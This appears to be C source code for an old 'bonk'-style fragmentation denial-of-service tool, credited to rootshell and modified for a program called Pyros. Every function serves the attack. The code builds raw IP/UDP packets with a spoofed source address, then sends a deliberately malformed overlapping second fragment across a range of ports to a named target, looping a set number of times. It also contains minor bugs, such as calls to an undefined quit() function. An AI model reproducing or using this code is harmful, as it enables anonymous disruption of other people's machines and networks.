/*
* Atrix Team 1994, 2001 - http://www.atrix.cjb.net
* Original Code by rootshell
* Modified by SeCToR-X 03/01/2001
*
* File modified for Pyros 1.5
*/

#define FRG_CONST       0x3
#define PADDING         0x1c

struct budp_pkt
{
        struct iphdr    ip;
        struct udphdr   udp;
        char data[PADDING];
} bpkt;

int     budplen = sizeof(struct udphdr),
        biplen = sizeof(struct iphdr),
        bdatalen = 100,
        bpsize = sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
        spf_sck;                        /* Socket */


u_long bhost_to_ip(char *host_name)
{
        static  u_long ip_bytes;
        struct hostent *res;

        res = gethostbyname(host_name);
        if (res == NULL)
                return (0);
        memcpy(&ip_bytes, res->h_addr, res->h_length);
        return (ip_bytes);
}

void bquit(char *reason)
{
        perror(reason);
        close(spf_sck);
        exit(-1);
}

int bfondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
           int dst_prt)
{
        int     bs;
        struct  sockaddr_in to;

        memset(&bpkt, 0, bpsize);
                                                /* Fill in ip header */
        bpkt.ip.version = 4;
        bpkt.ip.ihl = 5;
        bpkt.ip.tot_len = htons(budplen + biplen + PADDING);
        bpkt.ip.id = htons(0x455);
        bpkt.ip.ttl = 255;
        bpkt.ip.protocol = IP_UDP;
        bpkt.ip.saddr = src_addr;
        bpkt.ip.daddr = dst_addr;
        bpkt.ip.frag_off = htons(0x2000);        /* more to come */

        bpkt.udp.source = htons(src_prt);        /* udp header */
        bpkt.udp.dest = htons(dst_prt);
        bpkt.udp.len = htons(8 + PADDING);
                                                /* send 1st frag */

        to.sin_family = AF_INET;
        to.sin_port = src_prt;
        to.sin_addr.s_addr = dst_addr;

        bs = sendto(sck, &bpkt, bpsize, 0, (struct sockaddr *) &to,
                sizeof(struct sockaddr));

        bpkt.ip.frag_off = htons(FRG_CONST + 1);         /* shinanigan */
        bpkt.ip.tot_len = htons(biplen + FRG_CONST);
                                                        /* 2nd frag */

        bs = sendto(sck, &bpkt, biplen + FRG_CONST + 1, 0,
                (struct sockaddr *) &to, sizeof(struct sockaddr));

        return bs;
}

void pboink(char *spf, char *targetip, int sp, int ep, int nnum)
{
        u_long  src_addr,
                dst_addr;

        int     i,
               /* src_prt = 55,
                  dst_prt = 55, */ 
                start_port,
                stop_port,
                bs = 1,
                pkt_count;

        start_port = sp;
        stop_port = ep;        
        pkt_count = nnum;
        
        /* Resolve hostnames */

        src_addr = bhost_to_ip(spf);
        if (!src_addr)
                quit("bad source host");
        dst_addr = bhost_to_ip(targetip);
        if (!dst_addr)
                quit("bad target host");

        spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (!spf_sck)
                quit("socket()");
        if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
        sizeof(bs)) < 0)
                quit("IP_HDRINCL");

        for (i = 0; i < pkt_count; ++i)
        {
                int j;
                
                printf ("(%d)%s:%d->%d\n", i, targetip, start_port, stop_port);
                
                for (j = start_port; j != stop_port; j++) {
                
                 /* fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt); */
                    bfondle (spf_sck, src_addr, dst_addr, j, j);

                }
                usleep(10000);
        }

        printf("Done.\n");
}
